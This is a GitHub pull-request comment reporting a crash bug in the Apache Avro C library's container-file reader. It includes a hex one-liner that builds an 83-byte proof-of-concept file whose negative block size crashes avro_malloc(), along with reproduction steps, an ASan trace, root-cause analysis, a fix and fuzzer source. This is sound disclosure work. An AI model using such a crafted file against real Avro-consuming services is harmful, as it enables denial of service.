OwenSanzas commented on PR #3623: URL: https://github.com/apache/avro/pull/3623#issuecomment-3746385334
Thanks for the reply! Here is the context of the crash we found: ## Description Negative block size in Avro container file (OCF) causes `allocation-size-too-big` crash in `file_read_block_count()`. The function reads block size using varint/zigzag encoding which can represent negative numbers, but does not validate before passing to `avro_malloc()`. ## Version - Apache Avro C library - Tested on: current main branch - Commit: HEAD ## Steps to Reproduce ### Method 1: Using avrocat (Easiest) **Step 1**: Build Avro C library with AddressSanitizer: ```bash git clone https://github.com/apache/avro.git cd avro/lang/c mkdir build && cd build cmake .. \ -DCMAKE_C_COMPILER=clang \ -DCMAKE_C_FLAGS="-fsanitize=address -g -O1" \ -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" make -j$(nproc) ``` **Step 2**: Create the malicious Avro container file (83 bytes): ```bash # One-liner to create poc.avro echo '4f626a0104166176726f2e736368656d611e7b2274797065223a226e756c6c227d146176726f2e636f646563086e756c6c000102030405060708090a0b0c0d0e0f10000102030405060708090a0b0c0d0e0f10' | xxd -r -p > poc.avro ``` **Step 3**: Trigger the crash: ```bash ./src/avrocat poc.avro ``` ### Method 2: Using the fuzzer **Step 1**: Build Avro C library with AddressSanitizer (same as above). **Step 2**: Save the fuzzer code below as `datafile_fuzzer.c`. **Step 3**: Build the fuzzer: ```bash clang -g -O1 -fsanitize=address,fuzzer \ -I../src \ datafile_fuzzer.c \ -L./src -lavro \ -Wl,-rpath,./src \ -o datafile_fuzzer ``` **Step 4**: Create PoC and run: ```bash echo '4f626a0104166176726f2e736368656d611e7b2274797065223a226e756c6c227d146176726f2e636f646563086e756c6c000102030405060708090a0b0c0d0e0f10000102030405060708090a0b0c0d0e0f10' | xxd -r -p > poc.avro ./datafile_fuzzer poc.avro ``` ## Expected Behavior The Avro C library should validate that block size is non-negative and return an error for malformed files. ## Actual Behavior ``` ==PID==ERROR: AddressSanitizer: requested allocation size 0xffffffffffffffff (0x800 after adjustments for alignment, red zones etc.) exceeds maximum supported size of 0x10000000000 (thread T0) #0 0x... in realloc (...) #1 0x... in file_read_block_count /path/to/avro/lang/c/src/datafile.c:459:35 #2 0x... in avro_file_reader_fp /path/to/avro/lang/c/src/datafile.c:529:9 ... SUMMARY: AddressSanitizer: allocation-size-too-big ... in realloc ``` ## Root Cause Analysis In `lang/c/src/datafile.c:452-459`, the `file_read_block_count()` function reads block size using zigzag-encoded varint: ```c static int file_read_block_count(avro_file_reader_t r) { int64_t len; ... check_prefix(rval, enc->read_long(r->reader, &len), "Cannot read file block size: "); if (!r->current_blockdata) { r->current_blockdata = (char *) avro_malloc(len); // BUG: len can be negative! ... } } ``` **Control flow for crash file:** 1. File header parsed successfully (valid "Obj\x01" magic, schema, codec, sync marker) 2. `file_read_block_count()` called at line 529 3. `read_long()` reads block_count from byte 0x00 at offset 0x42 → decoded = 0 4. `read_long()` reads block_size from byte 0x01 at offset 0x43 5. Zigzag decode: `(1 >> 1) ^ -(1 & 1) = 0 ^ -1 = -1` 6. `avro_malloc(-1)` → `avro_malloc(0xFFFFFFFFFFFFFFFF)` → CRASH **File structure of PoC:** ``` Offset Bytes Description ------ ----- ----------- 00-03: 4f 62 6a 01 Magic "Obj\x01" 04-31: ... Metadata map (schema={"type":"null"}, codec=null) 32-41: ... Sync marker (16 bytes) 42: 00 block_count varint (decoded = 0) 43: 01 block_size varint (zigzag decode = -1) <- TRIGGER ``` ## Impact - **DoS**: Application crash via allocation failure - **CWE-789**: Memory Allocation with Excessive Size Value - **Affected**: Any application using Avro C library to read untrusted `.avro` files Attack vectors: - Data analytics platforms accepting user uploads - ETL pipelines processing external data - Message queue consumers (Kafka with Avro) - Any service that reads Avro container files ## Suggested Fix > **Note**: This is a quick fix for this specific vulnerability. A comprehensive audit of all `read_long()` call sites that use decoded values for memory allocation is recommended, as similar issues may exist elsewhere in the codebase. Add validation for negative block size in `file_read_block_count()`: ```c static int file_read_block_count(avro_file_reader_t r) { int64_t len; ... check_prefix(rval, enc->read_long(r->reader, &len), "Cannot read file block size: "); if (len < 0) { avro_set_error("Invalid block size: %" PRId64, len); return EINVAL; } if (!r->current_blockdata) { r->current_blockdata = (char *) avro_malloc(len); ... } } ``` ## Fuzzer This issue was discovered using a custom Avro datafile fuzzer: ```c /* * Copyright 2026 O2Lab @ Texas A&M University * * Fuzzer for Avro C DataFile Reader * Target: avro_file_reader_fp() and avro_file_reader_read_value() */ #include <stdint.h> #include <stddef.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <avro.h> int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) { if (size < 4) { return 0; } /* Write fuzz data to a temporary file */ char template[] = "/tmp/avro_fuzz_XXXXXX"; int fd = mkstemp(template); if (fd < 0) { return 0; } ssize_t written = write(fd, data, size); if (written != (ssize_t)size) { close(fd); unlink(template); return 0; } lseek(fd, 0, SEEK_SET); FILE *fp = fdopen(fd, "rb"); if (fp == NULL) { close(fd); unlink(template); return 0; } avro_file_reader_t reader = NULL; avro_value_iface_t *iface = NULL; avro_value_t value; int rc; rc = avro_file_reader_fp(fp, template, 0, &reader); if (rc != 0 || reader == NULL) { fclose(fp); unlink(template); return 0; } avro_schema_t schema = avro_file_reader_get_writer_schema(reader); if (schema == NULL) { avro_file_reader_close(reader); fclose(fp); unlink(template); return 0; } iface = avro_generic_class_from_schema(schema); if (iface == NULL) { avro_schema_decref(schema); avro_file_reader_close(reader); fclose(fp); unlink(template); return 0; } memset(&value, 0, sizeof(value)); rc = avro_generic_value_new(iface, &value); if (rc != 0) { avro_value_iface_decref(iface); avro_schema_decref(schema); avro_file_reader_close(reader); fclose(fp); unlink(template); return 0; } /* Read up to 100 values */ for (int i = 0; i < 100; i++) { rc = avro_file_reader_read_value(reader, &value); if (rc != 0) { break; } avro_value_reset(&value); } avro_value_decref(&value); avro_value_iface_decref(iface); avro_schema_decref(schema); avro_file_reader_close(reader); fclose(fp); unlink(template); return 0; } ``` -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: [email protected] For queries about this service, please contact Infrastructure at: [email protected]
